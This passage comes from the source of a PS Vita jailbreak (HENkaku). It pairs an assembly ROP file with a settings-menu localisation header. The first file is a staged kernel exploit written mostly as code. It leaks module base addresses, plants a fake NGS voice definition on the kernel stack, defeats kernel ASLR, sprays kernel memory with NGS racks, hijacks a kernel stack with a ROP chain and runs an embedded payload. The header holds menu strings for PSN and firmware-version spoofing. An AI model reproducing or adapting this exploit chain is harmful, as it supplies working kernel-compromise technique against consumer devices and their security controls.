 92 |   call_rv   sceKernelGetMemBlockBase, ret, framebuf + 0x04
 93 | 
 94 |   // Set framebuf
 95 |   call_vv sceDisplaySetFrameBuf, framebuf, SCE_DISPLAY_SETBUF_NEXTFRAME
 96 | 
 97 |   // Flash white
 98 |   call_lvv memset, framebuf + 0x04, 0xff, 960 * 544 * 4
 99 | 
100 |   // Get SceLibKernel base address
101 |   call_v   sceIoOpen, 0xDEADBEEF
102 |   get_lr
103 |   add_rv   ret, SCE_LIB_KERNEL_OFFSET
104 |   store_rv ret, libkernel_base
105 | 
106 |   // Get SceLibKernel functions
107 |   load_add_store sceKernelGetModuleList, libkernel_base, GET_MODULE_LIST_OFFSET
108 |   load_add_store sceKernelGetModuleInfo, libkernel_base, GET_MODULE_INFO_OFFSET
109 |   load_add_store sceKernelGetThreadInfo, libkernel_base, GET_THREAD_INFO_OFFSET
110 |   load_add_store sceIoDevctl,            libkernel_base, DEVCTL_OFFSET
111 | 
112 |   // Load SceNgsUser module
113 |   call_v sceSysmoduleLoadModule, SCE_SYSMODULE_NGS
114 | 
115 |   // Get first entry of module list which should be SceNgsUser
116 |   store_vv      1, mod_count
117 |   load_call_vvv sceKernelGetModuleList, 0xff, mod_list, mod_count
118 | 
119 |   // Get SceNgsUser base address
120 |   store_vv     0x1b8, mod_info + 0x00
121 |   load_call_lv sceKernelGetModuleInfo, mod_list + 0x00, mod_info
122 |   store_lv     mod_info + 0x15c, ngs_base
123 | 
124 |   // Get SceNgsUser functions
125 |   load_add_store sceNgsSystemGetRequiredMemorySize, ngs_base, SYSTEM_GET_SIZE_OFFSET
126 |   load_add_store sceNgsSystemInit,                  ngs_base, SYSTEM_INIT_OFFSET
127 |   load_add_store sceNgsRackGetRequiredMemorySize,   ngs_base, RACK_GET_SIZE_OFFSET
128 |   load_add_store sceNgsRackInit,                    ngs_base, RACK_INIT_OFFSET
129 |   load_add_store sceNgsRackRelease,                 ngs_base, RACK_RELEASE_OFFSET
130 | 
131 |   // Determine memory requirement for system
132 |   load_call_vv sceNgsSystemGetRequiredMemorySize, init_params, sys_size
133 | 
134 |   // Allocate system memory
135 |   call_vl  memalign, 256, sys_size
136 |   store_rv           ret, sys_mem
137 | 
138 |   // Initialize ngs system
139 |   load_call_llvv sceNgsSystemInit, sys_mem, sys_size, init_params, sys_handle
140 | 
141 |   /** STAGE 2: Search kernel stack base address **/
142 | 
143 |   // Set up fake voice definition
144 |   call_vvv memset,                         voice_def_buf, 0, 0x400
145 |   store_vv SCE_NGS_VOICE_DEFINITION_MAGIC, voice_def_buf + 0x00
146 |   store_vv SCE_NGS_VOICE_DEFINITION_FLAGS, voice_def_buf + 0x04
147 |   store_vv 0x40,                           voice_def_buf + 0x08
148 |   store_vv 0x40,                           voice_def_buf + 0x0c
149 | 
150 |   // Plant fake voice definition into kernel stack
151 |   load_call_vvvvvv sceIoDevctl, empty_string, 0, voice_def_buf, 0x3ff, NULL, 0
152 | 
153 |   // Iterate through kernel memory
154 |   loop_start:
155 |     // kstack_base += KSTACK_BASE_STEP
156 |     load_add_store kstack_base, kstack_base, KSTACK_BASE_STEP
157 | 
158 |     // rack_desc.pVoiceDefn = kstack_base ^ SCE_NGS_VOICE_DEFINITION_XOR
159 |     xor_rv   ret, SCE_NGS_VOICE_DEFINITION_XOR
160 |     store_rv ret, rack_desc + 0x00
161 | 
162 |     // Call sceNgsRackGetRequiredMemorySize on the xor'ed kstack_base
163 |     load_call_lvv_2 sceNgsRackGetRequiredMemorySize, sys_handle, rack_desc, buffer_info + 0x04
164 | 
165 |     // Compare ret with SCE_NGS_ERROR_INVALID_PARAM and return 1 if equal, else 0
166 |     cmp_eq_rv ret, SCE_NGS_ERROR_INVALID_PARAM
167 | 
168 |     // ret = ret * (loop_start - loop_end) + loop_end
169 |     mul_add_rvv ret, loop_start - loop_end, loop_end
170 | 
171 |     // Stack pivot
172 |     store_rv         ret, ldm_data_r0 + 0x0c
173 |     set_r0_r2_ip_sp_lr_pc ldm_data_r0
174 |   loop_end:
175 | 
176 |   // Get kernel stack base address
177 |   load_add_store kstack_base, kstack_base, -KSTACK_DEVCTL_INDATA_OFFSET
178 | 
179 |   /** STAGE 3: Defeat kernel ASLR **/
180 | 
181 |   // Set presets information in voice definition
182 |   store_vv PRESET_LIST_OFFSET, voice_def_buf + 0x30
183 |   store_vv 2,                  voice_def_buf + 0x34
184 | 
185 |   // Set presets
186 |   set_preset 0, 0,                   -(0x148 + 2 * 0x18) + COPYOUT_PARAMS_OFFSET
187 |   set_preset 1, FAKE_COPYOUT_OFFSET, FAKE_COPYOUT_SIZE
188 | 
189 |   // Overwrite copyout's dst, src and len
190 |   call_vvv memset,      voice_def_buf + FAKE_COPYOUT_OFFSET, 0, FAKE_COPYOUT_SIZE
191 |   store_vv sysmem_base, voice_def_buf + FAKE_COPYOUT_OFFSET + 0x04 // dst
192 |   add_lv   kstack_base, KSTACK_SYSMEM_OFFSET
193 |   store_rv ret,         voice_def_buf + FAKE_COPYOUT_OFFSET + 0x08 // src
194 |   store_vv 4,           voice_def_buf + FAKE_COPYOUT_OFFSET + 0x1c // len
195 | 
196 |   // Trigger exploit
197 |   trigger_exploit
198 | 
199 |   // Get SceSysmem base address
200 |   load_add_store sysmem_base, sysmem_base, SCE_SYSMEM_OFFSET
201 | 
202 |   /** STAGE 4: Kernel spraying **/
203 | 
204 |   // Set presets information in voice definition
205 |   store_vv PRESET_LIST_OFFSET, voice_def_buf + 0x30
206 |   store_vv 1,                  voice_def_buf + 0x34
207 | 
208 |   // Set dummy preset to make the SceNgsBlock 0x2000 bytes big
209 |   set_preset_dummy 0, -KSTACK_DEVCTL_INDATA_OFFSET, 0x1000
210 | 
211 |   // Plant fake voice definition into kernel stack
212 |   load_call_vvvvvv sceIoDevctl, empty_string, 0, voice_def_buf, 0x3ff, NULL, 0
213 | 
214 |   // Determine memory requirement for rack
215 |   load_call_lvv sceNgsRackGetRequiredMemorySize, sys_handle, rack_desc, buffer_info + 0x04
216 | 
217 |   // Allocate rack memory
218 |   call_vl  memalign, 256, buffer_info + 0x04
219 |   store_rv           ret, buffer_info + 0x00
220 | 
221 |   // Spraying
222 |   .rept 40
223 |     load_call_lvvv sceNgsRackInit, sys_handle, buffer_info, rack_desc, rack_handle
224 |   .endr
225 | 
226 |   // Initialize two more racks
227 |   load_call_lvvv sceNgsRackInit, sys_handle, buffer_info, rack_desc, rack_first
228 |   load_call_lvvv sceNgsRackInit, sys_handle, buffer_info, rack_desc, rack_second
229 | 
230 |   // Free rack memory
231 |   call_l free, buffer_info + 0x00
232 | 
233 |   /** STAGE 5: Prepare target **/
234 | 
235 |   // Build kernel rop chain
236 |   build_krop krop_buf
237 | 
238 |   // Release first rack handle to make a hole
239 |   load_call_lv sceNgsRackRelease, rack_first, NULL
240 | 
241 |   // Create a new thread to allocate another kernel stack which should occupy the block of the first released rack
242 |   call_vvvvvvv sceKernelCreateThread, empty_string, pop_pc, SCE_KERNEL_DEFAULT_PRIORITY, 0x1000, 0, 0, NULL
243 |   store_rv     ret, thread_id
244 | 
245 |   // Get thread stack base address
246 |   store_vv     0x7c, thread_info + 0x00
247 |   load_call_lv sceKernelGetThreadInfo, thread_id, thread_info
248 |   store_lv     thread_info + 0x34, thread_stack_base
249 | 
250 |   // Start thread to plant the kernel rop chain into the new kernel stack and wait for its execution
251 |   call_lvv sceKernelStartThread, thread_id, thread_rop_end - thread_rop_start, thread_rop_start
252 | 
253 |   /** STAGE 6: Trigger kernel rop execution **/
254 | 
255 |   // Release second rack handle
256 |   load_call_lv sceNgsRackRelease, rack_second, NULL
257 | 
258 |   // Set presets information in voice definition
259 |   store_vv PRESET_LIST_OFFSET, voice_def_buf + 0x30
260 |   store_vv 4,                  voice_def_buf + 0x34
261 | 
262 |   // Set presets
263 |   set_preset 0, 0,                  -(0x148 + 4 * 0x18) - OVERWRITE_SIZE
264 |   set_preset 1, OVERWRITE_OFFSET,   OVERWRITE_SIZE
265 |   set_preset 2, FAKE_HEADER_OFFSET, FAKE_HEADER_SIZE
266 |   set_preset 3, 0,                  0x1000 // Makes the SceNgsBlock 0x2000 bytes big, but will be ignored
267 | 
268 |   // Build pivot kernel rop chain
269 |   build_pivot_krop voice_def_buf + OVERWRITE_OFFSET
270 | 
271 |   // Exit and delete thread once the syscall returns back to user
272 |   store_lv thread_stack_base,         voice_def_buf + OVERWRITE_OFFSET + 0x54 // sp
273 |   store_vv pop_pc,                    voice_def_buf + OVERWRITE_OFFSET + 0x58 // lr
274 |   store_vv sceKernelExitDeleteThread, voice_def_buf + OVERWRITE_OFFSET + 0x5c // pc
275 | 
276 |   // Fake header to force an early termination, such that we can avoid any possible crashes
277 |   call_vvv memset, voice_def_buf + FAKE_HEADER_OFFSET, 0, FAKE_HEADER_SIZE
278 | 
279 |   // Trigger exploit
280 |   trigger_exploit
281 | 
282 |   /** STAGE 7: Cleanup **/
283 | 
284 |   // Free system memory
285 |   call_l free, sys_mem
286 | 
287 |   // Release system handle
288 |   // load_call_l sceNgsSystemRelease, sys_handle
289 | 
290 |   // Wait for thread to end (we should have executed the kernel payload by the time this wakes up)
291 |   call_lvv sceKernelWaitThreadEnd, thread_id, NULL, NULL
292 | 
293 |   // Exit and delete thread
294 |   call_v sceKernelExitDeleteThread, 0
295 | 
296 | // Data section
297 | 
298 | // Thread rop chain
299 | thread_rop_start:
300 |   // Plant kernel rop chain into kernel stack
301 |   load_call_vvvvvv sceIoDevctl, empty_string, 0, krop_buf, 0x3ff, NULL, 0
302 | 
303 |   // After 100ms the syscall will pop the overwritten return address from kernel stack
304 |   call_v sceKernelDelayThread, 100 * 1000
305 | 
306 |   // Exit and delete thread
307 |   call_v sceKernelExitDeleteThread, 0
308 | thread_rop_end:
309 | 
310 | // ldm data for setting sp
311 | ldm_data_r0:                       .word 0xDEADBEEF // r0
312 |                                    .word 0xDEADBEEF // r2
313 |                                    .word 0xDEADBEEF // ip
314 |                                    .word 0xDEADBEEF // sp
315 |                                    .word 0xDEADBEEF // lr
316 |                                    .word pop_pc     // pc
317 | 
318 | // ldm data for setting lr
319 | ldm_data_r8:                       .word 0xDEADBEEF // r0
320 |                                    .word 0xDEADBEEF // r1
321 |                                    .word 0xDEADBEEF // r4
322 |                                    .word 0xDEADBEEF // r5
323 |                                    .word 0xDEADBEEF // sl
324 |                                    .word 0xDEADBEEF // ip
325 |                                    .word 0xDEADBEEF // lr
326 |                                    .word pop_pc     // pc
327 | 
328 | // Framebuf
329 | framebuf:                          .word 24         // size
330 |                                    .word 0xDEADBEEF // base
331 |                                    .word 960        // pitch
332 |                                    .word 0          // pixelformat
333 |                                    .word 960        // width
334 |                                    .word 544        // height
335 | 
336 | // Ngs system init params
337 | init_params:                       .word 64         // nMaxRacks
338 |                                    .word 64         // nMaxVoices
339 |                                    .word 512        // nGranularity
340 |                                    .word 48000      // nSampleRate
341 |                                    .word 1          // nMaxModules
342 | 
343 | // Rack description
344 | rack_desc:                         .word 0xDEADBEEF // pVoiceDefn
345 |                                    .word 1          // nVoices
346 |                                    .word 1          // nChannelsPerVoice
347 |                                    .word 0          // nMaxPatchesPerInput
348 |                                    .word 0          // nPatchesPerOutput
349 |                                    .word 0          // pUserReleaseData
350 | 
351 | // Message :)
352 | message:                           .word 0xDEADBEEF
353 |                                    .string "Hi Sony! Hire me :)"
354 | 
355 | // Kernel payload
356 | payload_start:
357 | .incbin "payload.bin.gz", 0xa // skip gzip header
358 | payload_end:
359 | .set payload_size, payload_end - payload_start
360 | .balign 0x4
361 | 
362 | // Base addresses
363 | kstack_base:                       .word KSTACK_BASE_START - KSTACK_BASE_STEP + KSTACK_DEVCTL_INDATA_OFFSET
364 | sysmem_base:                       .word 0
365 | libkernel_base:                    .word 0
366 | ngs_base:                          .word 0
367 | 
368 | // SceLibKernel functions
369 | sceKernelGetModuleList:            .word 0
370 | sceKernelGetModuleInfo:            .word 0
371 | sceKernelGetThreadInfo:            .word 0
372 | sceIoDevctl:                       .word 0
373 | 
374 | // SceNgsUser functions
375 | sceNgsSystemGetRequiredMemorySize: .word 0
376 | sceNgsSystemInit:                  .word 0
377 | sceNgsRackGetRequiredMemorySize:   .word 0
378 | sceNgsRackInit:                    .word 0
379 | sceNgsRackRelease:                 .word 0
380 | 
381 | // Module variables
382 | mod_count:                         .word 0
383 | mod_list:                          .zero 0x4
384 | mod_info:                          .zero 0x1b8
385 | 
386 | // Thread variables
387 | thread_id:                         .word 0
388 | thread_stack_base:                 .word 0
389 | thread_info:                       .zero 0x7c
390 | 
391 | // Ngs system variables
392 | sys_handle:                        .word 0
393 | sys_mem:                           .word 0
394 | sys_size:                          .word 0
395 | 
396 | // Ngs rack variables
397 | buffer_info:                       .word 0 // data
398 |                                    .word 0 // size
399 | 
400 | rack_handle:                       .word 0
401 | rack_first:                        .word 0
402 | rack_second:                       .word 0
403 | 
404 | // Voice definition buffer
405 | voice_def_buf:                     .zero 0x400
406 | 
407 | // Kernel rop chain buffer
408 | krop_buf:                          .zero 0x400
409 | 


--------------------------------------------------------------------------------
/plugin/language.h:
--------------------------------------------------------------------------------
  1 | /**
  2 |  * @brief      Language container for HENkaku Settings
  3 |  */
  4 | #ifndef LANGUAGE_HEADER
  5 | #define LANGUAGE_HEADER
  6 | 
  7 | typedef struct {
  8 |   wchar_t *msg_henkaku_settings;
  9 |   wchar_t *msg_enable_psn_spoofing;
 10 |   wchar_t *msg_enable_unsafe_homebrew;
 11 |   wchar_t *msg_unsafe_homebrew_description;
 12 |   wchar_t *msg_enable_version_spoofing;
 13 |   wchar_t *msg_spoofed_version;
 14 |   wchar_t *msg_button_behavior;
 15 |   wchar_t *msg_button_enter;
 16 |   wchar_t *msg_button_cancel;
 17 |   wchar_t *msg_reload_taihen_config;
 18 |   wchar_t *msg_reload_taihen_config_success;
 19 |   wchar_t *msg_reboot_device;
 20 |   wchar_t *msg_content_downloader;
 21 |   wchar_t *msg_unlink_memory_card;
 22 |   wchar_t *msg_unlink_memory_card_success;
 23 |   wchar_t *msg_unlink_memory_card_error;
 24 | } language_container_t;
 25 | 
 26 | // by Nzaki0716 & SnyFbSx & kirisame0017
 27 | language_container_t language_japanese = {  
 28 |   L"HENkakuの設定",
 29 |   L"PSNの偽装を有効化",
 30 |   L"リスクのあるユーザープログラムを有効化",
 31 |   L"リスクのあるユーザープログラムは誤った操作や設定、または悪意のあるコードにより端末に修復不可能なダメージを与えることがあります。\nこれらをインストールする際は注意してください。",
 32 |   L"バージョンの偽装を有効化",
 33 |   L"偽装バージョンの確認",
 34 |   L"○ボタンの動作設定",
 35 |   L"決定",
 36 |   L"キャンセル",
 37 |   L"taiHEN config.txtのリロード",
 38 |   L"taiHEN config.txtのリロードが完了しました。",
 39 |   L"端末の再起動",
 40 |   L"コンテンツ ダウンローダー",
 41 |   L"メモリーカードとのリンクを解除する",
 42 |   L"ux0:id.datが削除されました。メモリーカードはこのVita以外でも使用できるようになりました。",
 43 |   L"ux0のマウントに失敗しました。メモリーカードは挿入されていますか？",
 44 | };
 45 | 
 46 | // by molecule
 47 | language_container_t language_english_us = {
 48 |   L"HENkaku Settings",
 49 |   L"Enable PSN spoofing",
 50 |   L"Enable Unsafe Homebrew",
 51 |   L"Unsafe homebrews can damage your device permanently, if they are misused, misconfigured, or malicious.\nPlease take caution when installing them.",
 52 |   L"Enable Version Spoofing",
 53 |   L"Spoofed Version",
 54 |   L"○ Button Behavior",
 55 |   L"Enter",
 56 |   L"Cancel",
 57 |   L"Reload taiHEN config.txt",
 58 |   L"taiHEN config.txt has been successfully reloaded.",
 59 |   L"Reboot Device",
 60 |   L"Content Downloader",
 61 |   L"Unlink Memory Card",
 62 |   L"ux0:id.dat has been deleted. This memory card can now be used on any Vita.",
 63 |   L"Failed to mount ux0. Is a memory card inserted?",
 64 | };
 65 | 
 66 | // by jokira & devnoname120 & CelesteBlue-dev & chronoss09 & francl35
 67 | language_container_t language_french = {
 68 |   L"Paramètres de HENkaku",
 69 |   L"Activer le spoof du PSN",
 70 |   L"Autoriser l'installation de homebrews non sécurisés",
 71 |   L"Les homebrews non sécurisés peuvent endommager votre système de façon permanente s'ils sont mal utilisés, mal configurés, ou malveillants.\nPrenez garde en activant ce paramètre.",
 72 |   L"Activer le spoof de version",
 73 |   L"Version spoofée",
 74 |   L"Action du bouton ○",
 75 |   L"Valider",
 76 |   L"Annuler",
 77 |   L"Recharger le fichier config.txt de taiHEN",
 78 |   L"Le fichier config.txt de taiHEN a bien été rechargé.",
 79 |   L"Redémarrer la console",
 80 |   L"Téléchargement de contenu",
 81 |   L"Délier la carte mémoire",
 82 |   L"ux0:id.dat a été supprimé. Cette carte mémoire peut être utilisée sur n'importe quelle Vita.",
 83 |   L"Le montage de ux0 a échoué. Y a-t-il une carte mémoire insérée?",
 84 | };
 85 | 
 86 | // by EricWeichhart & iamn0tdev & WZ-JK
 87 | language_container_t language_spanish = {
 88 |   L"Ajustes de HENkaku",
 89 |   L"Activar Spoofing para PSN",
 90 |   L"Activar Homebrew inseguro",
 91 |   L"Homebrews inseguros pueden dañar tu dispositivo permanentemente si son maliciosos, erróneamente usados o configurados incorrectamente.\nPor favor, tenga precaución al instalarlos.",
 92 |   L"Activar Spoofing de versión",
 93 |   L"Versión para Spoofing",
 94 |   L"Comportamiento del botón ○",
 95 |   L"Aceptar",
 96 |   L"Cancelar",
 97 |   L"Recargar taiHEN config.txt",
 98 |   L"taiHEN config.txt ha sido recargado correctamente.",
 99 |   L"Reiniciar dispositivo",
100 |   L"Descargador de Contenido",
101 |   L"Desvincular la Tarjeta de Memoria",
102 |   L"El ux0:id.dat ha sido eliminado. Esta tarjeta de memoria ahora se puede utilizar en cualquier Vita.",
103 |   L"Ha habido un fallo al montar el ux0. ¿Se ha insertado una tarjeta de memoria?",
104 | };
105 | 
106 | // by Ziusun
107 | language_container_t language_german = {
108 |   L"HENkaku-Einstellungen",
109 |   L"PSN-Zugang aktivieren",
110 |   L"Unsichere Homebrew zulassen",
111 |   L"Unsichere Homebrew kann das Gerät dauerhaft beschädigen, sollte sie unsachgemäß eingesetzt und konfiguriert werden oder schadhaft sein.\nDie Installation bitte immer mit größter Sorgfalt vornehmen.",
112 |   L"Andere Firmware vortäuschen",
113 |   L"Aktuelle Firmware",
114 |   L"Funktion der ○-Taste",
115 |   L"Bestätigen",
116 |   L"Abbrechen",
117 |   L"Die config.txt von taiHEN aktualisieren",
118 |   L"Die config.txt von taiHEN wurde erfolgreich aktualisiert.",
119 |   L"Gerät neustarten",
120 |   L"Inhaltsdownloader",
121 |   L"Speicherkarte entkoppeln",
122 |   L"Der Dateieintrag ux0:id.dat wurde gelöscht. Diese Speicherkarte kann jetzt mit jeder Playstation Vita verwendet werden.",
123 |   L"Die Partition ux0: konnte nicht gemountet werden. Ist eine Speicherkarte eingesteckt?",
124 | };
125 | 
126 | // by blackjack4it & Checcolino & Rufis01
127 | language_container_t language_italian = {
128 |   L"Impostazioni Henkaku",
129 |   L"Abilita lo Spoof PSN",
130 |   L"Abilita Homebrews non sicuri",
131 |   L"Gli Homebrews non sicuri possono danneggiare irrimediabilmente la tua console, se usati/configurati non correttamente o sospetti.\nFai molta attenzione prima di procedere alla loro installazione.",
132 |   L"Abilita lo Spoof della versione corrente",
133 |   L"Versione corrente (Spoof)",
134 |   L"Comportamento del tasto ○",
135 |   L"OK",
136 |   L"Annulla",
137 |   L"Ricarica taiHEN config.txt",
138 |   L"TaiHEN config.txt ricaricato correttamente.",
139 |   L"Riavvia dispositivo",
140 |   L"Scarica contenuto",
141 |   L"Disassocia Memory Card",
142 |   L"ux0:id.dat è stato cancellato. Adesso questa Memory Card può essere usata su qualsiasi PS Vita.",
143 |   L"Impossibile montare ux0. La Memory Card è inserita?",
144 | };
145 | 
146 | // by ConsoleHax & 2dook & jja2000
147 | language_container_t language_dutch = {
148 |   L"HENkaku Instellingen",
149 |   L"Activeer PSN spoofing",
150 |   L"Onveilige Homebrew toestaan",
151 |   L"Onveilige homebrew kan uw toestel permanent beschadigen indien deze onjuist geconfigureerd of kwaadaardig zijn.\nLet op met wat u installeert.",
152 |   L"Schakel Versie Spoofing in",
153 |   L"Spoofed Versie",
154 |   L"Gedrag van de ○-knop",
155 |   L"Enter",
156 |   L"Annuleren",
157 |   L"Herlaad taiHEN config.txt",
158 |   L"taiHEN config.txt is succesvol herladen.",
159 |   L"Herstart apparaat",
160 |   L"Inhoud downloader",
161 |   L"Geheugenkaart loskoppelen",
162 |   L"ux0:id.dat is verwijderd. Deze geheugenkaart kan nu op elke Vita gebruikt worden.",
163 |   L"Aankoppelen van ux0 is mislukt. Is er wel een geheugenkaart aanwezig?",
164 | };
165 | 
166 | // by gnmmarechal & menelkir & bosshunter
167 | language_container_t language_portuguese_pt = {
168 |   L"Definições do HENkaku",
169 |   L"Ativar spoof da PSN",
170 |   L"Permitir aplicações inseguras",
171 |   L"Aplicações inseguras podem danificar o sistema permanentemente, se forem mal usadas, configuradas ou maliciosas.\nTenha cuidado ao instalá-las.",
172 |   L"Ativar spoof da versão",
173 |   L"Versão do spoof",
174 |   L"Ação do botão ○",
175 |   L"Entrar",
176 |   L"Cancelar",
177 |   L"Recarrege o ficheiro config.txt do taiHEN",
178 |   L"O ficheiro taiHEN config.txt foi recarregado com sucesso.",
179 |   L"Reiniciar o dispositivo",
180 |   L"Descarregar Conteúdo",
181 |   L"Desassociar Cartão de Memória",
182 |   L"ux0:id.dat foi eliminado. Este cartão de memória pode agora ser usado em qualquer Vita.",
183 |   L"Falha ao montar ux0. O cartão de memória está inserido?",
184 | };
185 | 
186 | // by Tenek & MuskratDesman & dec0dOS
187 | language_container_t language_russian = {
188 |   L"Настройки HENkaku",
189 |   L"Включить спуфинг PSN",
190 |   L"Включить небезопасные приложения",
191 |   L"Небезопасные приложения могут повредить ваше устройство навсегда, если они используются неправильно, неправильно настроены или вредоносны.\nПожалуйста, проявляйте осторожность при их установке.",
192 |   L"Включить подмену версии",
193 |   L"Поддельная версия",
194 |   L"Поведение кнопки ○",
195 |   L"Ввод",
196 |   L"Отмена",
197 |   L"Перезагрузить taiHEN config.txt",
198 |   L"taiHEN config.txt был успешно перезагружен.",
199 |   L"Перезапустить устройство",
200 |   L"Загрузчик контента",
201 |   L"Отвязать карту памяти",
202 |   L"ux0:id.dat был удален. Эта карта памяти теперь может быть использована на любой PSVita.",
203 |   L"Ошибка при монтировании ux0. Проверьте, вставлена ли карта памяти",
204 | };
205 | 
206 | // by TriggerHavoc
207 | language_container_t language_korean = {
208 |   L"HENkaku 설정",
209 |   L"PSN 스푸핑 활성화",
210 |   L"안전하지 않은 홈브류 허용",
211 |   L"만약 안전하지 않은 홈브류들이 잘못 사용되거나 잘못 구성되거나 또는 악의가 있을 경우 당신의 기기를 영구적으로 손상시킬 수 있습니다. 설치 시 주의해 주세요.",
212 |   L"버전 스푸핑 활성화",
213 |   L"스푸핑 버전",
214 |   L"○ 버튼 동작",
215 |   L"확인",
216 |   L"취소",
217 |   L"taiHEN config.txt 다시 불러오기",
218 |   L"taiHEN config.txt를 성공적으로 다시 불러왔습니다.",
219 |   L"기기 다시 시작",
220 |   L"컨텐츠 다운로더",
221 |   L"메모리 카드 언링크",
222 |   L"ux0:id.dat가 삭제되었습니다. 이제 이 메모리 카드는 모든 Vita에서 사용하실 수 있습니다.",
223 |   L"ux0을 마운트하지 못했습니다. 메모리 카드가 올바르게 삽입되어 있습니까?",
224 | };
225 | 
226 | // by iTZQing & FlexingTiger & magpte
227 | language_container_t language_chinese_t = {
228 |   L"HENkaku設置",
229 |   L"啟用PSN偽裝",
230 |   L"啟用不安全自制軟件",
231 |   L"如果不安全自制軟件被誤用、配置出現錯誤或軟件本身是惡意程序，可能會永久性損壞你的設備。\n請謹慎安裝！",
232 |   L"啟用版本偽裝",
233 |   L"偽裝版本",
234 |   L"○鍵配置",
235 |   L"確定",
236 |   L"取消",
237 |   L"重載taiHEN config.txt",
238 |   L"重載taiHEN config.txt成功",
239 |   L"重啟設備",
240 |   L"下載內容管理器",
241 |   L"解除記憶卡關聯",
242 |   L"已刪除ux0:id.dat，現在這張記憶卡可應用到任意PSV上",
243 |   L"掛載ux0失敗，請檢查記憶卡是否插入",
244 | };
245 | 
246 | // by iTZQing & FlexingTiger & magpte
247 | language_container_t language_chinese_s = {
248 |   L"HENkaku设置",
249 |   L"启用PSN伪装",
250 |   L"启用不安全自制软件",
251 |   L"如果不安全自制软件被误用、配置出现错误或软件本身是恶意程序，可能会永久性损坏你的设备。\n请谨慎安装！",
252 |   L"启用版本伪装",
253 |   L"伪装版本",
254 |   L"○键配置",
255 |   L"确定",
256 |   L"取消",
257 |   L"重载taiHEN config.txt",
258 |   L"重载taiHEN config.txt成功",
259 |   L"重启设备",
260 |   L"下载内容管理器",
261 |   L"解除存储卡关联",
262 |   L"已删除ux0:id.dat，现在这张存储卡可用在任意PSV上",
263 |   L"挂载ux0失败，请检查存储卡是否插入",
264 | };
265 | 
266 | // by v5000a & poppamies
267 | language_container_t language_finnish = {
268 |   L"HENkakun Asetukset",
269 |   L"Ota PSN spooffaaminen käyttöön",
270 |   L"Salli vaaralliset homebrew-ohjelmat",
271 |   L"Vaaralliset homebrew-ohjelmat voivat vahingoittaa laitettasi pysyvästi, mikäli niitä käytetään väärin, ne konfiguroidaan väärin, tai ne ovat haittaohjelmia.\nOle varovainen asentaessasi niitä.",
272 |   L"Ota version spooffaaminen käyttöön",
273 |   L"Spooffattu versio",
274 |   L"○-näppäimen toiminto",
275 |   L"Valitse",
276 |   L"Peruuta",
277 |   L"Lataa taiHEN config.txt uudelleen",
278 |   L"taiHEN config.txt uudelleenladattiin onnistuneesti.",
279 |   L"Käynnistä laite uudelleen",
280 |   L"Sisällönlataaja",
281 |   L"Irrota muistikortti",
282 |   L"ux0:id.dat on poistettu. Voit nyt käyttää tätä muistikorttia millä tahansa Vitalla.",
283 |   L"ux0:n liittäminen epäonnistui. Onko muistikortti laitteessa?",
284 | };
285 | 
286 | // by MrOrbital & GizmoTheGreen & Wassburgare
287 | language_container_t language_swedish = {
288 |   L"HENkaku-inställningar",
289 |   L"Aktivera fejkad PSN-inloggning",
290 |   L"Tillåt osäkra homebrews",
291 |   L"Osäkra homebrews kan skada din enhet permanent om de används felaktigt, är felkonfigurerade eller innehåller skadlig kod.\nVar försiktig vid installation av sådana.",
292 |   L"Aktivera fejkad version",
293 |   L"Fejkad version",
294 |   L"○-knappens beteende",
295 |   L"Välj",
296 |   L"Avbryt",
297 |   L"Ladda om taiHEN config.txt",
298 |   L"taiHEN config.txt har laddats om.",
299 |   L"Starta om enhet",
300 |   L"Innehållsnedladdare",
301 |   L"Avlänka minneskort",
302 |   L"ux0:id.dat har tagits bort. Det här minneskortet kan nu användas i valfri Vita.",
303 |   L"Misslyckades med att montera ux0. Har du satt i ett minneskort?",
304 | };
305 | 
306 | // by coestergaard & andrsnDK
307 | language_container_t language_danish = {
308 |   L"HENkaku indstillinger",
309 |   L"Aktiver PSN spoofing",
310 |   L"Tillad usikre homebrews",
311 |   L"Usikre homebrews kan skade din enhed permanent, hvis de bruges forkert, er fejlkonfigurerede eller indeholder skadelig kode.\nVær forsigtig når du installerer disse.",
312 |   L"Aktiver version spoofing",
313 |   L"Spoofed version",
314 |   L"○ knap funktion",
315 |   L"Vælg",
316 |   L"Afbryd",
317 |   L"Genindlæs taiHEN config.txt",
318 |   L"taiHEN config.txt er blevet genindlæst.",
319 |   L"Genstart enhed",
320 |   L"Indholdshenter",
321 |   L"Fjern link til hukommelseskort",
322 |   L"ux0:id.dat er blevet slettet. Dette hukommelseskort kan nu bruges på en vilkårlig Vita.",
323 |   L"Kunne ikke montere ux0. Er der indsat et hukommelseskort?",
324 | };
325 | 
326 | // by baniel105 & irchagaming & Promises
327 | language_container_t language_norwegian = {
328 |   L"HENkaku Instillinger",
329 |   L"Aktiver forfalsket PSN-innlogging",
330 |   L"Tillat usikker Homebrew",
331 |   L"Usikre Homebrews kan ødelegge enhenten din permanent, hvis de er misbrukt, feilkonfigerert, eller inneholder skadelig programvare.\nVær forsiktig ved installasjon.",
332 |   L"Aktiver forfalsket versjon",
333 |   L"Forfalsket versjon",
334 |   L"Funksjon på ○-knapp",
335 |   L"Velg",
336 |   L"Avbryt",
337 |   L"Last på nytt taiHEN config.txt",
338 |   L"taiHEN config.txt har blitt lastet.",
339 |   L"Start enheten på nytt",
340 |   L"Innholds Nedlaster",
341 |   L"Lås opp Minnekort",
342 |   L"ux0:id.dat er slettet. Dette minnekortet kan brukest på hvilken som helst Vita.",
343 |   L"Klarte ikkje montere av ux0. Har du satt i eit minnekort?",
344 | };
345 | 
346 | // by Grzybojad & szczuru & ItsYogSothoth & szczuru
347 | language_container_t language_polish = {
348 |   L"Ustawienia HENkaku",
349 |   L"Włącz fałszowanie PSN/SEN (spoofing)",
350 |   L"Zezwól na podejrzane Homebrew",
351 |   L"Podejrzane aplikacje mogą zawierać złośliwe oprogramowanie, przez co mogą trwale uszkodzić twoje urządzenie, jeżeli zostaną niepoprawnie użyte, bądź źle skonfigurowane.\nProszę zachować ostrożność przy ich instalacji.",
352 |   L"Włącz fałszowanie wersji oprogramowania (spoofing)",
353 |   L"Fałszowana wersja",
354 |   L"Akcja przycisku ○",
355 |   L"OK",
356 |   L"Anuluj",
357 |   L"Załaduj ponownie config.txt taiHEN",
358 |   L"config.txt taiHEN został pomyślnie załadowany ponownie.",
359 |   L"Uruchom ponownie konsolę",
360 |   L"Pobieranie zawartości",
361 |   L"Odłącz kartę pamięci",
362 |   L"Plik ux0:id.dat został usunięty z karty pamięci. Można jej teraz używać z każdym systemem PS Vita.",
363 |   L"Błąd podczas montowania partycji ux0, czy karta pamięci jest włożona?",
364 | };
365 | 
